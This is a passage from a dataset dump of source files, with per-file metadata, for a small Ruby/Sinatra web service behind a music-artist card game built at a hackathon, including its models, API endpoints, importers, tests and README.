"content_id": "971a9d4434ffc35b411f1b9e5dc14cde952dbc3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1434,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 59,
"path": "/config/schema.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "ActiveRecord::Schema.define do\n create_table :artists, :force => true do |t|\n t.timestamps\n t.string :name\n t.string :image_url\n end\n add_index :artists, :name\n \n create_table :artists_users, :force => true, :id => false do |t|\n t.integer :artist_id\n t.integer :user_id\n end\n add_index :artists_users, :artist_id\n add_index :artists_users, :user_id\n \n create_table :cards, :force => true do |t|\n t.timestamps\n t.belongs_to :artist\n t.belongs_to :game\n t.belongs_to :user\n t.integer :position\n end\n add_index :cards, [:game_id, :position]\n \n create_table :games, :force => true do |t|\n t.timestamps\n t.belongs_to :current_user\n t.string :current_stat\n end\n \n create_table :games_users, :force => true, :id => false do |t|\n t.integer :game_id\n t.integer :user_id\n end\n add_index :games_users, :game_id\n add_index :games_users, :user_id\n \n create_table :statistics, :force => true do |t|\n t.timestamps\n t.belongs_to :artist\n t.string :name\n t.float :value\n end\n add_index :statistics, [:artist_id, :name]\n \n create_table :identifiers, :force => true do |t|\n t.timestamps\n t.belongs_to :artist\n t.string :name\n t.string :value\n end\n add_index :identifiers, [:artist_id, :name]\n\n create_table :users, :force => true do |t|\n t.timestamps\n t.string :lastfm_username\n end\n add_index :users, :lastfm_username\nend\n"
},
{
"alpha_fraction": 0.6609442234039307,
"alphanum_fraction": 0.6609442234039307,
"avg_line_length": 24.88888931274414,
"blob_id": "8c49d3c95864e4f5330cb5b4411bddd01cfa433e",
"content_id": "ff3eefeac6f6bb070a9de401cda4f89e322d77ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 9,
"path": "/lib/mu_trumps/web.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Web\n \n autoload :Frontend, ROOT + '/mu_trumps/web/frontend'\n autoload :Application, ROOT + '/mu_trumps/web/application'\n autoload :Messaging, ROOT + '/mu_trumps/web/messaging'\n \n end\nend\n"
},
{
"alpha_fraction": 0.6596305966377258,
"alphanum_fraction": 0.6754617691040039,
"avg_line_length": 24.266666412353516,
"blob_id": "acc172df107d5d9b16d2ac16edaa4efbb8157129",
"content_id": "0a4a93b0aab993888edefb89fdbfdeb079df715b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 379,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/spec/mu_trumps/importer/seven_digital_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Importer::SevenDigital do\n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\")\n @importer = MuTrumps::Importer::SevenDigital.new(@imogen)\n end\n\n describe \"import_identifier\" do\n it \"adds the 7digital ID to the artist\" do\n @importer.import_identifier\n @imogen.ids[\"7digital\"].should == \"8321\"\n end\n end\nend\n"
},
{
"alpha_fraction": 0.7033638954162598,
"alphanum_fraction": 0.7033638954162598,
"avg_line_length": 24.153846740722656,
"blob_id": "f8fc043f26ad4047c7c96bb525e53ed6b8abc6c1",
"content_id": "0454c77ea8854ad6b75cb3492f5b5368c1e76865",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 327,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 13,
"path": "/lib/mu_trumps/importer.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'uri'\nrequire 'cgi'\nrequire 'net/http'\nrequire 'json'\nrequire 'nokogiri'\n\nmodule MuTrumps\n module Importer\n autoload :Echonest, ROOT + '/mu_trumps/importer/echonest'\n autoload :Lastfm, ROOT + '/mu_trumps/importer/lastfm'\n autoload :SevenDigital, ROOT + '/mu_trumps/importer/seven_digital'\n end\nend\n"
},
{
"alpha_fraction": 0.6616915464401245,
"alphanum_fraction": 0.6616915464401245,
"avg_line_length": 21.33333396911621,
"blob_id": "bf3d1c9a9b56089c8280f9533b7677e52ada9b8c",
"content_id": "ae9ff1cdb903486447cf66f55363bcdfffd6e31a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 9,
"path": "/lib/mu_trumps/model/user.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class User < ActiveRecord::Base\n has_and_belongs_to_many :artists, :uniq => true\n \n def self.[](username)\n find_or_create_by_lastfm_username(username)\n end\n end\nend\n"
},
{
"alpha_fraction": 0.7113401889801025,
"alphanum_fraction": 0.7113401889801025,
"avg_line_length": 26.714284896850586,
"blob_id": "7e54daede12cad3a01a8b365206059d251e612a9",
"content_id": "60678edba765c8d26507a974d78381e4e1c5927d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 194,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 7,
"path": "/lib/mu_trumps/model/identifier.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Identifier < ActiveRecord::Base\n belongs_to :artist\n validates_presence_of :artist, :name, :value\n validates_uniqueness_of :name, :scope => :artist_id\n end\nend\n"
},
{
"alpha_fraction": 0.6415094137191772,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 36.411766052246094,
"blob_id": "9910d2c17e04f2133d1a4394d277842a0e7caade",
"content_id": "1a4631ae3a5ba03ba5d6937decc03e3eb89d649c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 636,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 17,
"path": "/lib/mu_trumps.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n ROOT = File.expand_path(File.dirname(__FILE__))\n \n autoload :Artist, ROOT + '/mu_trumps/model/artist'\n autoload :Card, ROOT + '/mu_trumps/model/card'\n autoload :Game, ROOT + '/mu_trumps/model/game'\n autoload :Identifier, ROOT + '/mu_trumps/model/identifier'\n autoload :Statistic, ROOT + '/mu_trumps/model/statistic'\n autoload :User, ROOT + '/mu_trumps/model/user'\n \n autoload :Web, ROOT + '/mu_trumps/web'\n \n autoload :Importer, ROOT + '/mu_trumps/importer'\n autoload :Settings, ROOT + '/mu_trumps/settings'\nend\n\nrequire MuTrumps::ROOT + '/../config/environment'\n"
},
{
"alpha_fraction": 0.5443205833435059,
"alphanum_fraction": 0.5489649772644043,
"avg_line_length": 34.38028335571289,
"blob_id": "25b852ca90002cd7a083086b99c1799c0fd77423",
"content_id": "5cb5e1dfa768cca86eebbdc9d0414e8606a6ff0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 7536,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 213,
"path": "/spec/mu_trumps/web/application_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Web::Application do\n include Rack::Test::Methods\n let(:app) { MuTrumps::Web::Application.new }\n let(:json) { JSON.parse(last_response.body) }\n \n def artist_json(artist)\n {\"id\" => artist.id, \"name\" => artist.name, \"image\" => artist.image_url}\n end\n \n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\", :id => 100)\n @justin = Factory(:artist, :name => \"Justin Bieber\")\n @gaga = Factory(:artist, :name => \"Lady Gaga\")\n @sufjan = Factory(:artist, :name => \"Sufjan Stevens\")\n \n MuTrumps::Artist.all.each_with_index do |artist, index|\n artist.assign(\"stamina\", index)\n end\n \n @alice = Factory(:user, :lastfm_username => \"alice\")\n @bob = Factory(:user, :lastfm_username => \"bob\")\n end\n \n describe \"/artists/:id\" do\n before do\n artist = @imogen\n artist.assign(\"releases\", 23)\n artist.assign(\"concerts\", 1024)\n\n artist.identifiers << MuTrumps::Identifier.new(:name => \"7digital\", :value => \"8321\")\n end\n \n it \"returns details for an artist\" do\n get \"/artists/100.json\"\n json.should == {\n \"id\" => 100,\n \"name\" => \"Imogen Heap\",\n \"identifiers\" => {\n \"7digital\" => \"8321\"\n },\n \"stats\" => {\n \"releases\" => 23,\n \"concerts\" => 1024,\n \"stamina\" => 0\n }\n }\n end\n end\n \n describe \"/users/register.json\" do\n it \"returns an existing user\" do\n post \"/users/register.json\", :username => \"alice\"\n json.should == {\"id\" => @alice.id, \"username\" => \"alice\"}\n end\n \n it \"creates a new user\" do\n MuTrumps::User.find_by_lastfm_username(\"cecil\").should be_nil\n post \"/users/register.json\", :username => \"cecil\"\n cecil = MuTrumps::User.find_by_lastfm_username(\"cecil\")\n json.should == {\"id\" => cecil.id, \"username\" => \"cecil\"}\n end\n end\n \n describe \"/games.json\" do\n describe \"with no waiting games\" do\n it \"creates a waiting game and returns the user's cards\" do\n post \"/games.json\", :username => \"someguy\"\n game_id = MuTrumps::Game.first.id\n json.should == {\n \"status\" => \"waiting\",\n \"id\" => game_id,\n \"cards\" => [artist_json(@imogen), artist_json(@gaga)]\n }\n end\n end\n \n describe \"with a waiting game\" do\n before do\n @game = MuTrumps::Game.join(@alice)\n end\n \n it \"makes the game ready and returns the user's cards\" do\n post \"/games.json\", :username => \"bob\"\n json.should == {\n \"status\" => \"ready\",\n \"id\" => @game.id,\n \"cards\" => [artist_json(@justin), artist_json(@sufjan)]\n }\n end\n \n it \"messages the user who started the game\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"start\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"current_user\", \"username\" => \"alice\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"current_user\", \"username\" => \"alice\")\n post \"/games.json\", :username => \"bob\"\n end\n end\n end\n \n describe \"/games/:id.json\" do\n before do\n @game = MuTrumps::Game.join(@alice)\n MuTrumps::Game.join(@bob)\n end\n \n it \"returns the state of the game\" do\n get \"/games/#{@game.id}.json\"\n json.should == {\n \"status\" => \"ready\",\n \"id\" => @game.id,\n \"current_user\" => \"alice\",\n \"users\" => {\n \"alice\" => 2,\n \"bob\" => 2\n }\n }\n end\n end\n \n describe \"/games/:id/cards/:username.json\" do\n before do\n @game = MuTrumps::Game.join(@alice)\n MuTrumps::Game.join(@bob)\n end\n \n it \"returns the current deck for the user\" do\n get 
\"/games/#{@game.id}/cards/alice.json\"\n json.should == [artist_json(@imogen), artist_json(@gaga)]\n end\n end\n \n describe \"/games/:id/plays.json\" do\n before do\n MuTrumps::Game.join(@alice)\n @game = MuTrumps::Game.join(@bob)\n end\n \n it \"returns an error if an illegal move is made\" do\n post \"/games/#{@game.id}/plays.json\", :username => \"bob\", :artist_id => @justin.id, :stat => \"stamina\"\n json.should == {\"status\" => \"error\"}\n end\n \n it \"lets the current player make a move\" do\n post \"/games/#{@game.id}/plays.json\", :username => \"alice\", :artist_id => @imogen.id, :stat => \"stamina\"\n json.should == {\"status\" => \"ok\"}\n end\n \n it \"notifies the waiting user of the play\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"play\",\n \"username\" => \"alice\",\n \"stat\" => \"stamina\",\n \"value\" => 0)\n \n post \"/games/#{@game.id}/plays.json\", :username => \"alice\", :artist_id => @imogen.id, :stat => \"stamina\"\n end\n end\n \n describe \"/games/:id/ack.json\" do\n before do\n MuTrumps::Game.join(@alice)\n @game = MuTrumps::Game.join(@bob)\n post \"/games/#{@game.id}/plays.json\", :username => \"alice\", :artist_id => @imogen.id, :stat => \"stamina\"\n end\n \n it \"allows the waiting user to acknowledge the play\" do\n post \"/games/#{@game.id}/ack.json\", :username => \"bob\"\n json.should == {\"status\" => \"ok\"}\n end\n \n it \"notifies both players about the result of the round\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"result\", \"result\" => \"win\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"result\", \"result\" => \"lose\")\n\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"cards\", \"cards\" => [\n artist_json(@sufjan), artist_json(@imogen), artist_json(@justin)\n ])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"cards\", \"cards\" => [\n artist_json(@gaga)\n ])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"current_user\", \"username\" => \"bob\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"current_user\", \"username\" => \"bob\")\n \n post \"/games/#{@game.id}/ack.json\", :username => \"bob\"\n end\n \n describe \"when the move results in game over\" do\n before do\n post \"/games/#{@game.id}/ack.json\", :username => \"bob\"\n post \"/games/#{@game.id}/plays.json\", :username => \"bob\", :artist_id => @sufjan.id, :stat => \"stamina\"\n end\n \n it \"notifies both players about the result of the round\" do\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"result\", \"result\" => \"win\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"result\", \"result\" => \"lose\")\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"cards\", \"cards\" => [\n artist_json(@imogen), artist_json(@justin), artist_json(@gaga), artist_json(@sufjan)\n ])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"cards\", \"cards\" => [])\n \n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @alice, \"winner\", \"username\" => \"bob\")\n MuTrumps::Web::Messaging.should_receive(:publish).with(@game, @bob, \"winner\", \"username\" => \"bob\")\n \n post \"/games/#{@game.id}/ack.json\", :username => \"alice\"\n end\n end\n end\nend\n"
},
{
"alpha_fraction": 0.578125,
"alphanum_fraction": 0.5838068127632141,
"avg_line_length": 24.14285659790039,
"blob_id": "63709bbc0e3de849dba79f9cd092bb216213f059",
"content_id": "fd81ddda1aeeaf77f206bd5218848e5e58111014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 704,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 28,
"path": "/lib/mu_trumps/importer/seven_digital.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Importer\n\n class SevenDigital\n SERVICE_ROOT = 'http://api.7digital.com/1.2/'\n\n def initialize(artist)\n @artist = artist\n end\n\n def import_identifier\n name = CGI.escape(@artist.name)\n uri = URI.parse(\"#{SERVICE_ROOT}artist/search?q=#{name}&oauth_consumer_key=#{api_key}&country=GB\")\n response = Net::HTTP.get_response(uri)\n doc = Nokogiri::XML(response.body)\n id = doc.search('artist').first['id']\n\n @artist.identifiers << Identifier.new(:name => '7digital', :value => id)\n rescue\n end\n\n def api_key\n Settings.seven_digital.consumer_key\n end\n end\n\n end\nend\n"
},
{
"alpha_fraction": 0.5573333501815796,
"alphanum_fraction": 0.5573333501815796,
"avg_line_length": 18.736841201782227,
"blob_id": "189e40c6a179fb2d4681d6b052d0f0f44f3ece24",
"content_id": "9ae892a9f32b036826a939cc5976c8b7c4a6d62f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 19,
"path": "/lib/mu_trumps/settings.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Settings\n \n def self.method_missing(key)\n @root ||= new(YAML.load(File.read(ROOT + '/../config/settings.yml')))\n @root.__send__(key)\n end\n \n def initialize(hash)\n @hash = hash\n end\n \n def method_missing(key)\n value = @hash[key.to_s]\n Hash === value ? Settings.new(value) : value\n end\n \n end\nend\n"
},
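A sketch of how `Settings` resolves nested keys, assuming `config/settings.yml` contains something like `lastfm:\n  api_key: abc123` (the key shown is a placeholder):

```ruby
MuTrumps::Settings.lastfm.api_key  # => "abc123"
# Each nested Hash level is wrapped in another Settings object via method_missing.
```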
{
"alpha_fraction": 0.7265322208404541,
"alphanum_fraction": 0.736229658126831,
"avg_line_length": 31.632911682128906,
"blob_id": "4f2369cedff4e4df302106e5c32e3fcdb3906b0b",
"content_id": "6c82c0f7f7e96f109b70875926a6bb89c973ee3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "RDoc",
"length_bytes": 2580,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 79,
"path": "/README.rdoc",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "= µTrumps\n\nThis is the web service for µTrumps, a game built at Music Hack Day, at the\nMidem conference in Cannes. It was built by James[http://github.com/jcoglan],\nJono[http://github.com/jonocole], Ben[http://github.com/gearmonkey],\nJoris[http://twitter.com/joriszaalberg] and Gideon[http://twitter.com/gideonb].\n\nTo run the service, you need Ruby and these gems:\n\n gem install faye sinatra nokogiri activerecord acts_as_list sqlite3\n\nInitialize the database:\n\n rake db:setup\n\nAnd run the server:\n\n rackup -s thin -E production -p 8000 config.ru\n\n\n=== Tasks\n\n rake import:lastfm:top_artists[username]\n rake import:echonest:hotttnesss\n rake import:echonest:familiarity\n rake import:seven_digital:ids\n\n\n=== Testing\n\n gem install rspec rack-test factory_girl fakeweb\n rspec -bcf nested spec/\n\n\n== Service API\n\nThe service provides a RESTish interface for interacting with the game engine.\nThis consists of several GET/POST endpoints and a Bayeux messaging service, all\nof which output JSON.\n\n\n=== Using the messaging service\n\nIn-game events are transmitted to players through a pub/sub messaging service\nusing the Bayeux protocol. Each client should subscribe to a channel for the\ncurrent game and user, for example <tt>/games/1/alice</tt>. If you're developing\na JavaScript or Ruby client, you can use Faye[http://faye.jcoglan.com] to\nsubscribe to the channel and receive events.\n\nIf you don't have a Bayeux client available, you can set up long-polling by\nbuilding the protocol messages yourself: see https://gist.github.com/795082.\n\nEvents are transmitted as the data payload of Bayeux messages, so you can get\nthem using the Faye client:\n\n var fayeClient = new Faye.Client('http://localhost:8000/messaging')\n \n fayeClient.subscribe('/games/1/alice', function(event) {\n // handle event object\n })\n\nIf you're doing long-polling by hand, you can get the events out of the\n<tt>/meta/connect</tt> response by looking for messages with <tt>data</tt>\nfields, e.g.:\n\n connect = '{\"channel\":\"/meta/connect\",\"clientId\":\"' + client_id + '\",\"connectionType\":\"long-polling\"}'\n response = Net::HTTP.post_form(endpoint, 'message' => connect)\n \n # response.body == '[{\"channel\":\"/meta/connect\",...},{\"channel\":\"/games/1/alice\",\"data\":{\"event\":\"start\",...}},...]'\n JSON.parse(response.body).each do |message|\n if message['data']\n handle_event(message['data'])\n end\n end\n\nRemember to unsubscribe from the game channel when the game is over. See\nhttps://gist.github.com/795082 if you need to implement this yourself.\n\n fayeClient.unsubscribe('/games/1/alice')\n"
},
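The README mentions that a Ruby client can use Faye as well; here is a minimal sketch with the Faye Ruby client (gem `faye`, run inside EventMachine; the game id and username are placeholders):

```ruby
require 'eventmachine'
require 'faye'

EM.run do
  client = Faye::Client.new('http://localhost:8000/messaging')

  subscription = client.subscribe('/games/1/alice') do |event|
    puts "event: #{event['event']}"   # e.g. 'start', 'play', 'result'
  end

  # When the game is over:
  # subscription.cancel
end
```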
{
"alpha_fraction": 0.4851662516593933,
"alphanum_fraction": 0.4854219853878021,
"avg_line_length": 30.280000686645508,
"blob_id": "6363e470f38b6881e89ce5a0c17e39f48b224b92",
"content_id": "fb3e1bc85379c3e006863ad2395b376b79c0bfd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 3910,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 125,
"path": "/lib/mu_trumps/web/application.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'sinatra'\nrequire 'json'\n\nmodule MuTrumps\n module Web\n \n class Application < Sinatra::Base\n helpers do\n def cards_for_user(game, user)\n game.cards_for(user).map do |card|\n {'id' => card.artist.id, 'name' => card.artist.name, 'image' => card.artist.image_url}\n end\n end\n \n def notify_current_user(game)\n game.users.each do |user|\n Messaging.publish(game, user, 'current_user', 'username' => game.current_user.lastfm_username)\n end\n end\n \n def return_json(hash)\n headers 'Content-Type' => 'application/json'\n JSON.dump(hash)\n end\n end\n \n error do\n return_json('status' => 'error')\n end\n \n get '/artists/:id.json' do\n artist = Artist.find(params[:id])\n return_json('id' => artist.id,\n 'name' => artist.name,\n 'identifiers' => artist.ids,\n 'stats' => artist.stats)\n end\n \n post '/users/register.json' do\n user = User[params[:username]]\n return_json('id' => user.id, 'username' => user.lastfm_username)\n end\n \n post '/games.json' do\n user = User[params[:username]]\n game = Game.join(user)\n \n if game.users.size == 2\n Messaging.publish(game, game.users.first, \"start\")\n notify_current_user(game)\n end\n \n return_json('status' => game.status,\n 'id' => game.id,\n 'cards' => cards_for_user(game, user))\n end\n \n get '/games/:id.json' do\n game = Game.find(params[:id])\n scores = game.users.map { |u| [u.lastfm_username, game.cards_for(u).size] }\n \n return_json('status' => game.status,\n 'id' => game.id,\n 'current_user' => game.current_user.lastfm_username,\n 'users' => Hash[scores])\n end\n \n get '/games/:id/cards/:username.json' do\n game = Game.find(params[:id])\n user = User.find_by_lastfm_username(params[:username])\n return_json(cards_for_user(game, user))\n end\n \n post '/games/:id/plays.json' do\n begin\n game = Game.find(params[:id])\n user = User.find_by_lastfm_username(params[:username])\n artist = Artist.find(params[:artist_id])\n stat = params[:stat]\n \n game.play(user, artist, stat)\n \n Messaging.publish(game, game.waiting_user, 'play',\n 'username' => user.lastfm_username,\n 'stat' => stat,\n 'value' => artist.stats[stat])\n \n return_json('status' => 'ok')\n rescue\n return_json('status' => 'error')\n end\n end\n \n post '/games/:id/ack.json' do\n begin\n game = Game.find(params[:id])\n user = User.find_by_lastfm_username(params[:username])\n \n game.ack(user)\n \n Messaging.publish(game, game.current_user, 'result', 'result' => 'win')\n Messaging.publish(game, game.waiting_user, 'result', 'result' => 'lose')\n \n [game.current_user, game.waiting_user].each do |user|\n Messaging.publish(game, user, 'cards', 'cards' => cards_for_user(game, user))\n end\n \n if winner = game.winner\n game.users.each do |user|\n Messaging.publish(game, user, 'winner', 'username' => winner.lastfm_username)\n end\n else\n notify_current_user(game)\n end\n \n return_json('status' => 'ok')\n rescue\n return_json('status' => 'error')\n end\n end\n \n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.5981395244598389,
"alphanum_fraction": 0.6120930314064026,
"avg_line_length": 23.43181800842285,
"blob_id": "ef18058b9b34d56b2a1a1ba64c19b02467217805",
"content_id": "2f789d9fa062abe46ab19840956cb9c30bf337c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1075,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 44,
"path": "/spec/mu_trumps/model/artist_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Artist do\n let(:artist) do\n MuTrumps::Artist.create(:name => \"Imogen Heap\")\n end\n \n it \"is valid\" do\n artist.should be_valid\n end\n \n describe \"without a name\" do\n before { artist.name = nil }\n \n it \"is not valid\" do\n artist.should_not be_valid\n end\n end\n \n describe \"stats\" do\n before do\n artist.statistics << MuTrumps::Statistic.new(:name => \"releases\", \"value\" => 12)\n artist.statistics << MuTrumps::Statistic.new(:name => \"concerts\", \"value\" => 950)\n end\n \n it \"returns the statictics as a hash\" do\n artist.stats.should == {\"releases\" => 12, \"concerts\" => 950}\n end\n end\n \n describe \"assign\" do\n it \"adds a statistic to the artist\" do\n artist.assign(\"releases\", 9)\n artist.stats[\"releases\"].should == 9\n end\n \n it \"modifies an existing statistic\" do\n artist.assign(\"releases\", 2)\n artist.assign(\"releases\", 4)\n artist.statistics.should == [MuTrumps::Statistic.first]\n artist.stats.should == {\"releases\" => 4}\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6104512810707092,
"alphanum_fraction": 0.6104512810707092,
"avg_line_length": 22.38888931274414,
"blob_id": "06c2c24a076127cb94a57e833614c6c033eb048d",
"content_id": "54a3757e27243afbfaba10aa6ce64409957c9370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 421,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 18,
"path": "/spec/mu_trumps/importer/lastfm_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Importer::Lastfm do\n let(:importer) { MuTrumps::Importer::Lastfm.new(\"jcoglan\") }\n \n describe \"import_top_artists\" do\n let(:import) { importer.import_top_artists }\n \n it \"creates artists\" do\n import\n MuTrumps::Artist.all.map(&:name).should == [\n \"Iron & Wine\",\n \"The Magnetic Fields\",\n \"School of Seven Bells\"\n ]\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6474480032920837,
"alphanum_fraction": 0.6474480032920837,
"avg_line_length": 23.045454025268555,
"blob_id": "886845c902fc7234380722dedff1137acc7ebbce",
"content_id": "22d0e2f42a8dc793e6896c72c4837197a989e699",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1058,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 44,
"path": "/Rakefile",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require './lib/mu_trumps'\n\nnamespace :import do\n namespace :lastfm do\n task :top_artists, :username do |t, args|\n importer = MuTrumps::Importer::Lastfm.new(args.username)\n importer.logger { |s| puts s }\n importer.import_top_artists\n end\n end\n \n namespace :echonest do\n task :hotttnesss do\n MuTrumps::Artist.all.each do |artist|\n importer = MuTrumps::Importer::Echonest.new(artist)\n importer.import_hotttnesss\n end\n end\n \n task :familiarity do\n MuTrumps::Artist.all.each do |artist|\n importer = MuTrumps::Importer::Echonest.new(artist)\n importer.import_familiarity\n end\n end\n end\n\n namespace :seven_digital do\n task :ids do\n MuTrumps::Artist.all.each do |artist|\n importer = MuTrumps::Importer::SevenDigital.new(artist)\n importer.import_identifier\n end\n end\n end\nend\n\nnamespace :db do\n task :setup do\n dir = File.expand_path(File.dirname(__FILE__))\n require dir + '/config/environment'\n require dir + '/config/schema'\n end\nend\n"
},
{
"alpha_fraction": 0.6282420754432678,
"alphanum_fraction": 0.639769434928894,
"avg_line_length": 22.133333206176758,
"blob_id": "9f3a5fb491d9faea567143bc32e50c251a6de2ab",
"content_id": "2a9f5ff149b65fd2ae12478ecf088a91f815951e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 15,
"path": "/spec/thin_runner.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module ThinRunner\n def start(port)\n handler = Rack::Handler.get('thin')\n Thread.new do\n handler.run(self, :Port => port) { |server| @http_server = server }\n end\n sleep 0.1 until EM.reactor_running?\n end\n \n def stop\n @http_server.stop if @http_server\n @http_server = nil\n sleep 0.1 while EM.reactor_running?\n end\nend\n"
}
] | 37 |
paumonterop/P3_SCAV_VIDEO
|
https://github.com/paumonterop/P3_SCAV_VIDEO
|
fda39e1aa10439f8691d0ca4266d3f8242349dde
|
9413750bf3c684275e6fcf722cea1002ccd26da1
|
6a91e8e17a7c1831f758ac9b6bc0aee2df2449d2
|
refs/heads/main
| 2023-01-29T18:36:49.307062 | 2020-12-12T10:48:17 | 2020-12-12T10:48:17 | 319,476,605 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7328727841377258,
"alphanum_fraction": 0.7633851170539856,
"avg_line_length": 41.34146499633789,
"blob_id": "fa1329ed73b07add1df455a9de815330d8c934d5",
"content_id": "60069e8418555329e344a292750d835d28282437",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 236,
"num_lines": 41,
"path": "/README.md",
"repo_name": "paumonterop/P3_SCAV_VIDEO",
"src_encoding": "UTF-8",
"text": "# P3_SCAV_VIDEO\nPràctica 3 - SCAV - VIDEO\n\n**EXERCICI 1**\n\n- Cut BBB into 1 minute only video.\n*Amb el comando que ja haviem vist a les pràctiques anteriors*\n\n- Export BBB(1min) audio as a mono track.\nffmpeg -i bbb_1min.mp4 -ac 1 -acodec mp3 bbb_mp3.mp3\n\n- Export BBB(1min) audio in lower bitrate.\nffmpeg -i bbb_1min_mp3.mp3 -map 0:a:0 -b:a 16k bbb_1min_lowbitrate.mp3\n\n- Get subtitles of BBB through the internet and cut only the first minute (sorry, I think this needs to be done manually)\nbbb_subtitles.srt\n\n- Now package everything in a .mp4 with FFMPEG!!\nffmpeg -i bbb_1min.mp4 -i bbb_1min_lowbitrate.mp3 -i bbb_subtitles.srt -c copy -map 0:v:0 -map 1:a:0 -c:s mov_text bbb_1min_audio_subtitles.mp4\n\n\n**EXERCICI 2**\n\nAquest script permet crear un container MP4 directament executant-lo des del terminal posant el videoInput, AudioInput, subtitulsInput i el nom del fitxer de sortida. També es pot executar només er ajuntar audio al container de l'arxiu.\nEl podem executar des del terminal de la seguent manera:\nEXEMPLE: *python3 MP4container.py 'bbb_1min.mp4' 'bbb_mp3.mp3' 'bbb_subtitles.srt' 'outputFile.mp4'*\n\n**EXERCICI 3**\n\nAquest script et diu en quins Standards s'ajusta el video en questio tenint en compte el video i l'audio.\nEs pot executar directament des del terminal de la 